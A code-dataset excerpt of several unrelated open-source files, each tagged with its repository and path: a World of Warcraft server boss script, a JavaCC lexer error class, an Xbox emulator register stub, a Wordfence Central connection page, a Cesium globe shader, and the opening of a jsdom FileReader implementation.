if (LockEntry const* lock = sLockStore.LookupEntry(me->GetGOInfo()->goober.lockId))
{
hasKey = false;
for (uint32 i = 0; i < MAX_LOCK_CASE; ++i)
{
if (!lock->Index[i])
continue;
if (player->HasItemCount(lock->Index[i]))
{
hasKey = true;
break;
}
}
}
if (!hasKey)
return false;
// Start Algalon event
me->SetFlag(GAMEOBJECT_FLAGS, GO_FLAG_IN_USE);
_events.ScheduleEvent(EVENT_DESPAWN_CONSOLE, 5000);
if (Creature* brann = me->SummonCreature(NPC_BRANN_BRONZBEARD_ALG, BrannIntroSpawnPos))
brann->AI()->DoAction(ACTION_START_INTRO);
instance->SetData(DATA_ALGALON_SUMMON_STATE, 1);
if (GameObject* sigil = ObjectAccessor::GetGameObject(*me, instance->GetGuidData(DATA_SIGILDOOR_01)))
sigil->SetGoState(GO_STATE_ACTIVE);
if (GameObject* sigil = ObjectAccessor::GetGameObject(*me, instance->GetGuidData(DATA_SIGILDOOR_02)))
sigil->SetGoState(GO_STATE_ACTIVE);
return false;
}
void UpdateAI(uint32 diff) override
{
if (_events.Empty())
return;
_events.Update(diff);
while (uint32 eventId = _events.ExecuteEvent())
{
switch (eventId)
{
case EVENT_DESPAWN_CONSOLE:
me->Delete();
break;
}
}
}
EventMap _events;
};
GameObjectAI* GetAI(GameObject* go) const override
{
return GetUlduarAI<go_celestial_planetarium_accessAI>(go);
}
};
class spell_algalon_phase_punch : public SpellScriptLoader
{
public:
spell_algalon_phase_punch() : SpellScriptLoader("spell_algalon_phase_punch") { }
class spell_algalon_phase_punch_AuraScript : public AuraScript
{
PrepareAuraScript(spell_algalon_phase_punch_AuraScript);
void HandlePeriodic(AuraEffect const* /*aurEff*/)
{
PreventDefaultAction();
if (GetStackAmount() != 1)
GetTarget()->RemoveAurasDueToSpell(PhasePunchAlphaId[GetStackAmount() - 2]);
GetTarget()->CastSpell(GetTarget(), PhasePunchAlphaId[GetStackAmount() - 1], TRIGGERED_FULL_MASK);
if (GetStackAmount() == 5)
Remove(AURA_REMOVE_BY_DEFAULT);
}
void OnRemove(AuraEffect const*, AuraEffectHandleModes)
{
if (GetStackAmount() != 5)
GetTarget()->RemoveAurasDueToSpell(PhasePunchAlphaId[GetStackAmount() - 1]);
}
void Register() override
{
OnEffectPeriodic += AuraEffectPeriodicFn(spell_algalon_phase_punch_AuraScript::HandlePeriodic, EFFECT_0, SPELL_AURA_PERIODIC_DUMMY);
OnEffectRemove += AuraEffectRemoveFn(spell_algalon_phase_punch_AuraScript::OnRemove, EFFECT_0, SPELL_AURA_PERIODIC_DUMMY, AURA_EFFECT_HANDLE_REAL);
}
};
AuraScript* GetAuraScript() const override
{
return new spell_algalon_phase_punch_AuraScript();
}
};
class NotVictimFilter
{
public:
NotVictimFilter(Unit* caster) : _victim(caster->GetVictim())
{
}
bool operator()(WorldObject* target)
{
return target != _victim;
}
private:
Unit* _victim;
};
class spell_algalon_arcane_barrage : public SpellScriptLoader
{
public:
spell_algalon_arcane_barrage() : SpellScriptLoader("spell_algalon_arcane_barrage") { }
class spell_algalon_arcane_barrage_SpellScript : public SpellScript
{
PrepareSpellScript(spell_algalon_arcane_barrage_SpellScript);
void SelectTarget(std::list<WorldObject*>& targets)
{
targets.remove_if(NotVictimFilter(GetCaster()));
}
void Register() override
{
OnObjectAreaTargetSelect += SpellObjectAreaTargetSelectFn(spell_algalon_arcane_barrage_SpellScript::SelectTarget, EFFECT_0, TARGET_UNIT_SRC_AREA_ENEMY);
}
};
SpellScript* GetSpellScript() const override
{
return new spell_algalon_arcane_barrage_SpellScript();
}
};
class ActiveConstellationFilter
{
public:
bool operator()(WorldObject* target) const
{
return target->ToUnit() && target->ToUnit()->GetAI() && target->ToUnit()->GetAI()->GetData(0);
}
};
class spell_algalon_trigger_3_adds : public SpellScriptLoader
{
public:
spell_algalon_trigger_3_adds() : SpellScriptLoader("spell_algalon_trigger_3_adds") { }
class spell_algalon_trigger_3_adds_SpellScript : public SpellScript
{
PrepareSpellScript(spell_algalon_trigger_3_adds_SpellScript);
void SelectTarget(std::list<WorldObject*>& targets)
{
targets.remove_if(ActiveConstellationFilter());
}
void HandleDummy(SpellEffIndex effIndex)
{
PreventHitDefaultEffect(effIndex);
Creature* target = GetHitCreature();
if (!target)
return;
target->AI()->DoAction(ACTION_ACTIVATE_STAR);
}
void Register() override
{
OnObjectAreaTargetSelect += SpellObjectAreaTargetSelectFn(spell_algalon_trigger_3_adds_SpellScript::SelectTarget, EFFECT_0, TARGET_UNIT_SRC_AREA_ENTRY);
OnEffectHitTarget += SpellEffectFn(spell_algalon_trigger_3_adds_SpellScript::HandleDummy, EFFECT_0, SPELL_EFFECT_DUMMY);
}
};
SpellScript* GetSpellScript() const override
{
return new spell_algalon_trigger_3_adds_SpellScript();
}
};
class spell_algalon_collapse : public SpellScriptLoader
{
public:
spell_algalon_collapse() : SpellScriptLoader("spell_algalon_collapse") { }
class spell_algalon_collapse_AuraScript : public AuraScript
{
PrepareAuraScript(spell_algalon_collapse_AuraScript);
void HandlePeriodic(AuraEffect const* /*aurEff*/)
{
PreventDefaultAction();
GetTarget()->DealDamage(GetTarget(), GetTarget()->CountPctFromMaxHealth(1), nullptr, NODAMAGE);
}
void Register() override
{
OnEffectPeriodic += AuraEffectPeriodicFn(spell_algalon_collapse_AuraScript::HandlePeriodic, EFFECT_0, SPELL_AURA_PERIODIC_DUMMY);
}
};
AuraScript* GetAuraScript() const override
{
return new spell_algalon_collapse_AuraScript();
}
};
class spell_algalon_big_bang : public SpellScriptLoader
{
public:
spell_algalon_big_bang() : SpellScriptLoader("spell_algalon_big_bang") { }
class spell_algalon_big_bang_SpellScript : public SpellScript
{
PrepareSpellScript(spell_algalon_big_bang_SpellScript);
public:
spell_algalon_big_bang_SpellScript()
{
_targetCount = 0;
}
private:
bool Load() override
{
return GetCaster()->GetTypeId() == TYPEID_UNIT && GetCaster()->IsAIEnabled;
}
void CountTargets(std::list<WorldObject*>& targets)
{
_targetCount = targets.size();
}
void CheckTargets()
{
if (!_targetCount)
GetCaster()->GetAI()->DoAction(ACTION_ASCEND);
}
void Register() override
{
OnObjectAreaTargetSelect += SpellObjectAreaTargetSelectFn(spell_algalon_big_bang_SpellScript::CountTargets, EFFECT_0, TARGET_UNIT_SRC_AREA_ENEMY);
AfterCast += SpellCastFn(spell_algalon_big_bang_SpellScript::CheckTargets);
}
uint32 _targetCount;
};
SpellScript* GetSpellScript() const override
{
return new spell_algalon_big_bang_SpellScript();
}
};
class spell_algalon_remove_phase : public SpellScriptLoader
{
public:
spell_algalon_remove_phase() : SpellScriptLoader("spell_algalon_remove_phase") { }
class spell_algalon_remove_phase_AuraScript : public AuraScript
{
PrepareAuraScript(spell_algalon_remove_phase_AuraScript);
void HandlePeriodic(AuraEffect const* /*aurEff*/)
{
PreventDefaultAction();
GetTarget()->RemoveAurasByType(SPELL_AURA_PHASE);
}
void Register() override
{
OnEffectPeriodic += AuraEffectPeriodicFn(spell_algalon_remove_phase_AuraScript::HandlePeriodic, EFFECT_0, SPELL_AURA_PERIODIC_TRIGGER_SPELL);
}
};
AuraScript* GetAuraScript() const override
{
return new spell_algalon_remove_phase_AuraScript();
}
};
// 62295 - Cosmic Smash
class spell_algalon_cosmic_smash : public SpellScriptLoader
{
public:
spell_algalon_cosmic_smash() : SpellScriptLoader("spell_algalon_cosmic_smash") { }
class spell_algalon_cosmic_smash_SpellScript : public SpellScript
{
PrepareSpellScript(spell_algalon_cosmic_smash_SpellScript);
void ModDestHeight(SpellDestination& dest)
{
Position const offset = { 0.0f, 0.0f, 65.0f, 0.0f };
dest.RelocateOffset(offset);
}
void Register() override
{
OnDestinationTargetSelect += SpellDestinationTargetSelectFn(spell_algalon_cosmic_smash_SpellScript::ModDestHeight, EFFECT_0, TARGET_DEST_CASTER_SUMMON);
}
};
SpellScript* GetSpellScript() const override
{
return new spell_algalon_cosmic_smash_SpellScript();
}
};
class spell_algalon_cosmic_smash_damage : public SpellScriptLoader
{
public:
spell_algalon_cosmic_smash_damage() : SpellScriptLoader("spell_algalon_cosmic_smash_damage") { }
class spell_algalon_cosmic_smash_damage_SpellScript : public SpellScript
{
PrepareSpellScript(spell_algalon_cosmic_smash_damage_SpellScript);
void RecalculateDamage()
{
if (!GetExplTargetDest() || !GetHitUnit())
return;
float distance = GetHitUnit()->GetDistance2d(GetExplTargetDest()->GetPositionX(), GetExplTargetDest()->GetPositionY());
if (distance > 6.0f)
SetHitDamage(int32(float(GetHitDamage()) / distance) * 2);
}
void Register() override
{
OnHit += SpellHitFn(spell_algalon_cosmic_smash_damage_SpellScript::RecalculateDamage);
}
};
SpellScript* GetSpellScript() const override
{
return new spell_algalon_cosmic_smash_damage_SpellScript();
}
};
class spell_algalon_supermassive_fail : public SpellScriptLoader
{
public:
spell_algalon_supermassive_fail() : SpellScriptLoader("spell_algalon_supermassive_fail") { }
class spell_algalon_supermassive_fail_SpellScript : public SpellScript
{
PrepareSpellScript(spell_algalon_supermassive_fail_SpellScript);
void RecalculateDamage()
{
if (!GetHitPlayer())
return;
GetHitPlayer()->ResetAchievementCriteria(ACHIEVEMENT_CRITERIA_CONDITION_NO_SPELL_HIT, GetSpellInfo()->Id, true);
}
void Register() override
{
OnHit += SpellHitFn(spell_algalon_supermassive_fail_SpellScript::RecalculateDamage);
}
};
SpellScript* GetSpellScript() const override
{
return new spell_algalon_supermassive_fail_SpellScript();
}
};
class achievement_he_feeds_on_your_tears : public AchievementCriteriaScript
{
public:
achievement_he_feeds_on_your_tears() : AchievementCriteriaScript("achievement_he_feeds_on_your_tears") { }
bool OnCheck(Player* /*source*/, Unit* target) override
{
return !target->GetAI()->GetData(DATA_HAS_FED_ON_TEARS);
}
};
void AddSC_boss_algalon_the_observer()
{
new boss_algalon_the_observer();
new npc_living_constellation();
new npc_collapsing_star();
new npc_brann_bronzebeard_algalon();
new go_celestial_planetarium_access();
new spell_algalon_phase_punch();
new spell_algalon_arcane_barrage();
new spell_algalon_trigger_3_adds();
new spell_algalon_collapse();
new spell_algalon_big_bang();
new spell_algalon_remove_phase();
new spell_algalon_cosmic_smash();
new spell_algalon_cosmic_smash_damage();
new spell_algalon_supermassive_fail();
new achievement_he_feeds_on_your_tears();
}
| Effec7/Adamantium | src/server/scripts/Northrend/Ulduar/Ulduar/boss_algalon_the_observer.cpp | C++ | gpl-2.0 | 53,806 |
/* Generated By:JavaCC: Do not edit this line. TokenMgrError.java Version 5.0 */
/* JavaCCOptions: */
package pta.parser;
/** Token Manager Error. */
public class TokenMgrError extends Error
{
/**
* The version identifier for this Serializable class.
* Increment only if the <i>serialized</i> form of the
* class changes.
*/
private static final long serialVersionUID = 1L;
/*
* Ordinals for various reasons why an Error of this type can be thrown.
*/
/**
* Lexical error occurred.
*/
static final int LEXICAL_ERROR = 0;
/**
* An attempt was made to create a second instance of a static token manager.
*/
static final int STATIC_LEXER_ERROR = 1;
/**
* Tried to change to an invalid lexical state.
*/
static final int INVALID_LEXICAL_STATE = 2;
/**
* Detected (and bailed out of) an infinite loop in the token manager.
*/
static final int LOOP_DETECTED = 3;
/**
* Indicates the reason why the exception is thrown. It will have
* one of the above 4 values.
*/
int errorCode;
/**
* Replaces unprintable characters by their escaped (or unicode escaped)
* equivalents in the given string
*/
protected static final String addEscapes(String str) {
StringBuffer retval = new StringBuffer();
char ch;
for (int i = 0; i < str.length(); i++) {
switch (str.charAt(i))
{
case 0 :
continue;
case '\b':
retval.append("\\b");
continue;
case '\t':
retval.append("\\t");
continue;
case '\n':
retval.append("\\n");
continue;
case '\f':
retval.append("\\f");
continue;
case '\r':
retval.append("\\r");
continue;
case '\"':
retval.append("\\\"");
continue;
case '\'':
retval.append("\\\'");
continue;
case '\\':
retval.append("\\\\");
continue;
default:
if ((ch = str.charAt(i)) < 0x20 || ch > 0x7e) {
String s = "0000" + Integer.toString(ch, 16);
retval.append("\\u" + s.substring(s.length() - 4, s.length()));
} else {
retval.append(ch);
}
continue;
}
}
return retval.toString();
}
/**
* Returns a detailed message for the Error when it is thrown by the
* token manager to indicate a lexical error.
* Parameters :
* EOFSeen : indicates if EOF caused the lexical error
* curLexState : lexical state in which this error occurred
* errorLine : line number when the error occurred
* errorColumn : column number when the error occurred
* errorAfter : prefix that was seen before this error occurred
* curchar : the offending character
* Note: You can customize the lexical error message by modifying this method.
*/
protected static String LexicalError(boolean EOFSeen, int lexState, int errorLine, int errorColumn, String errorAfter, char curChar) {
return("Lexical error at line " +
errorLine + ", column " +
errorColumn + ". Encountered: " +
(EOFSeen ? "<EOF> " : ("\"" + addEscapes(String.valueOf(curChar)) + "\"") + " (" + (int)curChar + "), ") +
"after : \"" + addEscapes(errorAfter) + "\"");
}
/**
* You can also modify the body of this method to customize your error messages.
* For example, cases like LOOP_DETECTED and INVALID_LEXICAL_STATE are not
* of end-users concern, so you can return something like :
*
* "Internal Error : Please file a bug report .... "
*
* from this method for such cases in the release version of your parser.
*/
public String getMessage() {
return super.getMessage();
}
/*
* Constructors of various flavors follow.
*/
/** No arg constructor. */
public TokenMgrError() {
}
/** Constructor with message and reason. */
public TokenMgrError(String message, int reason) {
super(message);
errorCode = reason;
}
/** Full Constructor. */
public TokenMgrError(boolean EOFSeen, int lexState, int errorLine, int errorColumn, String errorAfter, char curChar, int reason) {
this(LexicalError(EOFSeen, lexState, errorLine, errorColumn, errorAfter, curChar), reason);
}
}
/* JavaCC - OriginalChecksum=3ba52b1aad3a7caf3b9352f06a64b532 (do not edit this line) */
| nicodelpiano/prism | src/pta/parser/TokenMgrError.java | Java | gpl-2.0 | 4,420 |
// This is an open source non-commercial project. Dear PVS-Studio, please check it.
// PVS-Studio Static Code Analyzer for C, C++ and C#: http://www.viva64.com
// ******************************************************************
// *
// * This file is part of the Cxbx project.
// *
// * Cxbx and Cxbe are free software; you can redistribute them
// * and/or modify them under the terms of the GNU General Public
// * License as published by the Free Software Foundation; either
// * version 2 of the license, or (at your option) any later version.
// *
// * This program is distributed in the hope that it will be useful,
// * but WITHOUT ANY WARRANTY; without even the implied warranty of
// * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// * GNU General Public License for more details.
// *
// * You should have recieved a copy of the GNU General Public License
// * along with this program; see the file COPYING.
// * If not, write to the Free Software Foundation, Inc.,
// * 59 Temple Place - Suite 330, Bostom, MA 02111-1307, USA.
// *
// * This file is heavily based on code from XQEMU
// * https://github.com/xqemu/xqemu/blob/master/hw/xbox/nv2a/nv2a_stubs.c
// * Copyright (c) 2012 espes
// * Copyright (c) 2015 Jannik Vogel
// * Copyright (c) 2018 Matt Borgerson
// *
// * Contributions for Cxbx-Reloaded
// * Copyright (c) 2017-2018 Luke Usher <luke.usher@outlook.com>
// * Copyright (c) 2018 Patrick van Logchem <pvanlogchem@gmail.com>
// *
// * All rights reserved
// *
// ******************************************************************
// TODO: Remove disabled warning once case are add to PSTRAPS switch.
#pragma warning(push)
#pragma warning(disable: 4065)
DEVICE_READ32(PSTRAPS)
{
DEVICE_READ32_SWITCH() {
default:
DEBUG_READ32_UNHANDLED(PSTRAPS);
break;
}
DEVICE_READ32_END(PSTRAPS);
}
#pragma warning(pop)
// TODO: Remove disabled warning once case are add to PSTRAPS switch.
#pragma warning(push)
#pragma warning(disable: 4065)
DEVICE_WRITE32(PSTRAPS)
{
switch (addr) {
default:
DEBUG_WRITE32_UNHANDLED(PSTRAPS);
break;
}
DEVICE_WRITE32_END(PSTRAPS);
}
#pragma warning(pop)
| Cxbx-Reloaded/Cxbx-Reloaded | src/devices/video/EmuNV2A_PSTRAPS.cpp | C++ | gpl-2.0 | 2,158 |
<?php
if (!defined('WORDFENCE_VERSION')) {
exit;
}
/**
* @var string $subpage
*/
$stepContent = array(
1 => __('Testing initial communication with Wordfence Central.', 'wordfence'),
2 => __('Passing public key to Wordfence Central.', 'wordfence'),
3 => __('Testing public key authentication with Wordfence Central.', 'wordfence'),
4 => __('Testing that Wordfence Central is able to communicate with this site.', 'wordfence'),
5 => __('Retrieving access token using authorization grant.', 'wordfence'),
6 => __('Redirecting back to Wordfence Central.', 'wordfence'),
);
$connected = wfCentral::isConnected();
$partialConnection = wfCentral::isPartialConnection();
?>
<?php
if (wfOnboardingController::shouldShowAttempt3()) {
echo wfView::create('onboarding/disabled-overlay')->render();
echo wfView::create('onboarding/banner')->render();
} else if (wfConfig::get('touppPromptNeeded')) {
echo wfView::create('gdpr/disabled-overlay')->render();
echo wfView::create('gdpr/banner')->render();
}
if (function_exists('network_admin_url') && is_multisite()) {
$wordfenceURL = network_admin_url('admin.php?page=Wordfence');
}
else {
$wordfenceURL = admin_url('admin.php?page=Wordfence');
}
?>
<div class="wrap wordfence">
<div class="wf-container-fluid">
<div class="wf-row">
<div class="wf-col-xs-12">
<div class="wp-header-end"></div>
<?php
echo wfView::create('common/section-title', array(
'title' => __('Wordfence Central', 'wordfence'),
'showIcon' => true,
))->render();
?>
</div>
<?php if ($connected): ?>
<div class="wf-col-xs-12 wf-central-connected">
<div class="wf-flex-row wf-flex-grow-all">
<div class="wf-flex-row-1 wf-block wf-active">
<div class="wf-central-dashboard">
<img class="wf-central-dashboard-logo" src="<?php echo wfUtils::getBaseURL() ?>images/wf-central-logo.svg" alt="Wordfence Central">
<div class="wf-central-dashboard-copy">
<p><strong><?php _e('Wordfence Central', 'wordfence') ?></strong></p>
<p><?php _e('Wordfence Central allows you to manage Wordfence on multiple sites from one location. It makes security monitoring and configuring Wordfence easier.', 'wordfence') ?></p>
<p class="wf-right-lg"><a href="https://www.wordfence.com/central" target="_blank" rel="noopener noreferrer"><strong><?php _e('Visit Wordfence Central', 'wordfence') ?></strong></a></p>
</div>
</div>
</div>
<div class="wf-flex-row-1 wf-block wf-active">
<p><strong><?php _e('Wordfence Central Status', 'wordfence') ?></strong></p>
<p><?php printf(__('Activated - connected by %s on %s', 'wordfence'), esc_html(wfConfig::get('wordfenceCentralConnectEmail')), date_i18n('F j, Y', (int) wfConfig::get('wordfenceCentralConnectTime'))) ?></p>
<p class="wf-right-lg"><a href="<?php echo esc_url($wordfenceURL); ?>"><strong><?php _e('Disconnect This Site', 'wordfence') ?></strong></a></p>
</div>
</div>
</div>
<?php elseif (isset($_GET['grant'])): ?>
<div class="wf-col-xs-12">
<div class="wf-block wf-active">
<div class="wf-block-header">
<div class="wf-block-header-content">
<strong><?php _e('Wordfence Central Installation Process') ?></strong>
</div>
</div>
<div class="wf-block-content">
<ul class="wf-block-list" id="wf-central-progress">
<?php for ($i = 1; $i <= 6; $i++): ?>
<li id="wf-central-progress-step<?php echo $i ?>" class="pending">
<div class="wf-central-progress-icon">
<div class="wf-step-pending"></div>
<div class="wf-step-running">
<?php
echo wfView::create('common/indeterminate-progress', array(
'size' => 50,
))->render();
?>
</div>
<div class="wf-step-complete-success"></div>
<div class="wf-step-complete-warning"></div>
</div>
<div class="wf-central-progress-content">
<p><?php echo esc_html($stepContent[$i]) ?></p>
</div>
</li>
<?php endfor ?>
</ul>
</div>
</div>
</div>
<?php elseif ($partialConnection): ?>
<div class="wf-center-lg">
<p><?php _e('It looks like you\'ve tried to connect this site to Wordfence Central, but the installation did not finish.', 'wordfence') ?></p>
<p>
<a href="<?php echo WORDFENCE_CENTRAL_URL_SEC ?>/sites/connection-issues?complete-setup=<?php echo esc_attr(wfConfig::get('wordfenceCentralSiteID')) ?>"
class="wf-btn wf-btn-primary"
><?php _e('Resume Installation', 'wordfence') ?></a>
<a href="<?php echo esc_url($wordfenceURL); ?>" class="wf-btn wf-btn-warning"><?php _e('Disconnect Site', 'wordfence') ?></a>
</p>
</div>
<?php else: ?>
<div class="wf-center-lg">
<p><?php _e('Wordfence Central allows you to manage Wordfence on multiple sites from one location. It makes security monitoring and configuring Wordfence easier.', 'wordfence') ?></p>
<p><?php _e('To connect your site your site to Wordfence Central, use the link below:', 'wordfence') ?></p>
<p class="wf-center">
<a href="<?php echo WORDFENCE_CENTRAL_URL_SEC ?>?newsite=<?php echo esc_attr(home_url()) ?>" class="wf-btn wf-btn-primary"><?php _e('Connect Site', 'wordfence') ?></a>
</p>
</div>
<?php endif ?>
</div>
</div>
</div>
<script>
(function($) {
var authGrant = '<?php echo esc_js(isset($_GET['grant']) ? $_GET['grant'] : '') ?>';
var currentStep = <?php echo json_encode(wfConfig::getInt('wordfenceCentralCurrentStep', 1)) ?>;
var connected = <?php echo json_encode($connected) ?>;
function wfConnectError(error) {
WFAD.colorboxError(error);
}
function wfCentralStepAjax(step, action, data, cb, cbErr, noLoading) {
var el = $('#wf-central-progress-' + step);
el.removeClass('pending')
.addClass('running');
WFAD.ajax(action, data, function(response) {
if (response && response.success) {
el.removeClass('running')
.addClass('complete-success');
cb && cb(response);
} else if (response && response.err) {
el.removeClass('running')
.addClass('complete-warning');
}
}, function(response) {
el.removeClass('running')
.addClass('complete-warning');
cbErr && cbErr(response);
}, noLoading);
}
var WFCentralInstaller = {};
window.WFCentralInstaller = WFCentralInstaller;
// Step 1: Makes GET request to `/central/api/site/access-token` endpoint authenticated with the auth grant supplied by the user.
// - Receives site GUID, public key, short lived JWT.
WFCentralInstaller.step1 = function() {
wfCentralStepAjax('step1', 'wordfence_wfcentral_step1', {
'auth-grant': authGrant
}, function(response) {
$(window).trigger('step2', response);
}, wfConnectError);
};
// Step 2: Makes PATCH request to `/central/api/wf/site/<guid>` endpoint passing in the new public key.
// Uses JWT from auth grant endpoint as auth.
WFCentralInstaller.step2 = function() {
wfCentralStepAjax('step2', 'wordfence_wfcentral_step2', {}, function(response) {
$(window).trigger('step3', response);
}, wfConnectError);
};
$(window).on('step2', WFCentralInstaller.step2);
// Step 3: Makes GET request to `/central/api/wf/site/<guid>` endpoint signed using Wordfence plugin private key.
// - Expects 200 response with site data.
WFCentralInstaller.step3 = function() {
wfCentralStepAjax('step3', 'wordfence_wfcentral_step3', {}, function(response) {
var callback = function() {
$(window).trigger('step4')
};
var interval = setInterval(callback, 4000);
$(window).on('step3-clearInterval', function() {
clearInterval(interval);
});
callback();
}, wfConnectError);
};
$(window).on('step3', WFCentralInstaller.step3);
// Step 4: Poll for PUT request at `/wp-json/wp/v2/wordfence-auth-grant/` endpoint signed using Wordfence Central private key with short lived JWT.
// - Expects verifiable signature of incoming request from Wordfence Central.
// - Stores auth grant JWT.
WFCentralInstaller.step4 = function() {
wfCentralStepAjax('step4', 'wordfence_wfcentral_step4', {}, function(response) {
if (response && response.success) {
$(window).trigger('step3-clearInterval');
$(window).trigger('step5');
}
}, wfConnectError);
};
$(window).on('step4', WFCentralInstaller.step4);
// Step 5: Makes GET request to `/central/api/site/<guid>/access-token` endpoint signed using Wordfence plugin private key with auth grant JWT.
// - Expects 200 response with access token.
WFCentralInstaller.step5 = function() {
wfCentralStepAjax('step5', 'wordfence_wfcentral_step5', {
'auth-grant': authGrant
}, function(response) {
$(window).trigger('step6', response);
}, wfConnectError);
};
$(window).on('step5', WFCentralInstaller.step5);
// Step 6: Installation complete. Redirect user back to Wordfence Central with access token.
WFCentralInstaller.step6 = function(response) {
wfCentralStepAjax('step6', 'wordfence_wfcentral_step6', {}, function(response) {
document.location.href = response['redirect-url'];
}, wfConnectError);
};
$(window).on('step6', WFCentralInstaller.step6);
var self = this;
$(function() {
// if (!authGrant) {
// wfConnectError('Auth grant not found.');
// return;
// }
if (!connected && authGrant) {
for (var i = 0; i < currentStep; i++) {
var el = $('#wf-central-progress-step' + i);
el.removeClass('pending')
.addClass('complete-success');
}
WFCentralInstaller['step' + currentStep]();
}
});
})(jQuery);
</script>
| Redcolaborar/Red-Colaborar | wp-content/plugins/wordfence/lib/menu_wordfence_central.php | PHP | gpl-3.0 | 9,727 |
//This file is automatically rebuilt by the Cesium build process.
/*global define*/
define(function() {
"use strict";
return "attribute vec4 position3DAndHeight;\n\
attribute vec3 textureCoordAndEncodedNormals;\n\
\n\
uniform vec3 u_center3D;\n\
uniform mat4 u_modifiedModelView;\n\
uniform vec4 u_tileRectangle;\n\
\n\
// Uniforms for 2D Mercator projection\n\
uniform vec2 u_southAndNorthLatitude;\n\
uniform vec2 u_southMercatorYAndOneOverHeight;\n\
\n\
varying vec3 v_positionMC;\n\
varying vec3 v_positionEC;\n\
\n\
varying vec2 v_textureCoordinates;\n\
varying vec3 v_normalMC;\n\
varying vec3 v_normalEC;\n\
\n\
#ifdef FOG\n\
varying float v_distance;\n\
varying vec3 v_mieColor;\n\
varying vec3 v_rayleighColor;\n\
#endif\n\
\n\
// These functions are generated at runtime.\n\
vec4 getPosition(vec3 position3DWC);\n\
float get2DYPositionFraction();\n\
\n\
vec4 getPosition3DMode(vec3 position3DWC)\n\
{\n\
return czm_projection * (u_modifiedModelView * vec4(position3DAndHeight.xyz, 1.0));\n\
}\n\
\n\
float get2DMercatorYPositionFraction()\n\
{\n\
// The width of a tile at level 11, in radians and assuming a single root tile, is\n\
// 2.0 * czm_pi / pow(2.0, 11.0)\n\
// We want to just linearly interpolate the 2D position from the texture coordinates\n\
// when we're at this level or higher. The constant below is the expression\n\
// above evaluated and then rounded up at the 4th significant digit.\n\
const float maxTileWidth = 0.003068;\n\
float positionFraction = textureCoordAndEncodedNormals.y;\n\
float southLatitude = u_southAndNorthLatitude.x;\n\
float northLatitude = u_southAndNorthLatitude.y;\n\
if (northLatitude - southLatitude > maxTileWidth)\n\
{\n\
float southMercatorY = u_southMercatorYAndOneOverHeight.x;\n\
float oneOverMercatorHeight = u_southMercatorYAndOneOverHeight.y;\n\
\n\
float currentLatitude = mix(southLatitude, northLatitude, textureCoordAndEncodedNormals.y);\n\
currentLatitude = clamp(currentLatitude, -czm_webMercatorMaxLatitude, czm_webMercatorMaxLatitude);\n\
positionFraction = czm_latitudeToWebMercatorFraction(currentLatitude, southMercatorY, oneOverMercatorHeight);\n\
} \n\
return positionFraction;\n\
}\n\
\n\
float get2DGeographicYPositionFraction()\n\
{\n\
return textureCoordAndEncodedNormals.y;\n\
}\n\
\n\
vec4 getPositionPlanarEarth(vec3 position3DWC, float height2D)\n\
{\n\
float yPositionFraction = get2DYPositionFraction();\n\
vec4 rtcPosition2D = vec4(height2D, mix(u_tileRectangle.st, u_tileRectangle.pq, vec2(textureCoordAndEncodedNormals.x, yPositionFraction)), 1.0); \n\
return czm_projection * (u_modifiedModelView * rtcPosition2D);\n\
}\n\
\n\
vec4 getPosition2DMode(vec3 position3DWC)\n\
{\n\
return getPositionPlanarEarth(position3DWC, 0.0);\n\
}\n\
\n\
vec4 getPositionColumbusViewMode(vec3 position3DWC)\n\
{\n\
return getPositionPlanarEarth(position3DWC, position3DAndHeight.w);\n\
}\n\
\n\
vec4 getPositionMorphingMode(vec3 position3DWC)\n\
{\n\
// We do not do RTC while morphing, so there is potential for jitter.\n\
// This is unlikely to be noticeable, though.\n\
float yPositionFraction = get2DYPositionFraction();\n\
vec4 position2DWC = vec4(0.0, mix(u_tileRectangle.st, u_tileRectangle.pq, vec2(textureCoordAndEncodedNormals.x, yPositionFraction)), 1.0);\n\
vec4 morphPosition = czm_columbusViewMorph(position2DWC, vec4(position3DWC, 1.0), czm_morphTime);\n\
return czm_modelViewProjection * morphPosition;\n\
}\n\
\n\
void main() \n\
{\n\
vec3 position3DWC = position3DAndHeight.xyz + u_center3D;\n\
\n\
gl_Position = getPosition(position3DWC);\n\
\n\
#if defined(ENABLE_VERTEX_LIGHTING)\n\
v_positionEC = (czm_modelView3D * vec4(position3DWC, 1.0)).xyz;\n\
v_positionMC = position3DWC; // position in model coordinates\n\
float encodedNormal = textureCoordAndEncodedNormals.z;\n\
v_normalMC = czm_octDecode(encodedNormal);\n\
v_normalEC = czm_normal3D * v_normalMC;\n\
#elif defined(SHOW_REFLECTIVE_OCEAN) || defined(ENABLE_DAYNIGHT_SHADING)\n\
v_positionEC = (czm_modelView3D * vec4(position3DWC, 1.0)).xyz;\n\
v_positionMC = position3DWC; // position in model coordinates\n\
#endif\n\
\n\
v_textureCoordinates = textureCoordAndEncodedNormals.xy;\n\
\n\
#ifdef FOG\n\
AtmosphereColor atmosColor = computeGroundAtmosphereFromSpace(position3DWC);\n\
v_mieColor = atmosColor.mie;\n\
v_rayleighColor = atmosColor.rayleigh;\n\
v_distance = length((czm_modelView3D * vec4(position3DWC, 1.0)).xyz);\n\
#endif\n\
}";
}); | nupic-community/nostradamIQ | nostradamIQ-landingpage/webapp/lib/cesium/1.16/Source/Shaders/GlobeVS.js | JavaScript | gpl-3.0 | 4,687 |
"use strict";
const whatwgEncoding = require("whatwg-encoding");
const parseContentType = require("content-type-parser");
const querystring = require("querystring");
const DOMException = require("domexception");
const EventTargetImpl = require("../events/EventTarget-impl").implementation;
const ProgressEvent = require("../generated/ProgressEvent");
const { setupForSimpleEventAccessors } = require("../helpers/create-event-accessor");
const READY_STATES = Object.freeze({
EMPTY: 0,
LOADING: 1,
DONE: 2
});
const events = ["loadstart", "progress", "load", "abort", "error", "loadend"];
class FileReaderImpl extends EventTargetImpl {
constructor(args, privateData) {
super([], privateData);
this.error = null;
this.readyState = READY_STATES.EMPTY;
this.result = null;
this._ownerDocument = privateData.window.document;
this._terminated = false;
}
readAsArrayBuffer(file) {
this._readFile(file, "buffer");
}
readAsDataURL(file) {
this._readFile(file, "dataURL");
}
readAsText(file, encoding) {
this._readFile(file, "text", whatwgEncoding.labelToName(encoding) || "UTF-8");
}
abort() {
if (this.readyState === READY_STATES.EMPTY || this.readyState === READY_STATES.DONE) {
this.result = null;
return;
}
if (this.readyState === READY_STATES.LOADING) {
this.readyState = READY_STATES.DONE;
this.result = null;
}
this._terminated = true;
this._fireProgressEvent("abort");
this._fireProgressEvent("loadend");
}
_fireProgressEvent(name, props) {
const event = ProgressEvent.createImpl([name, Object.assign({ bubbles: false, cancelable: false }, props)], {});
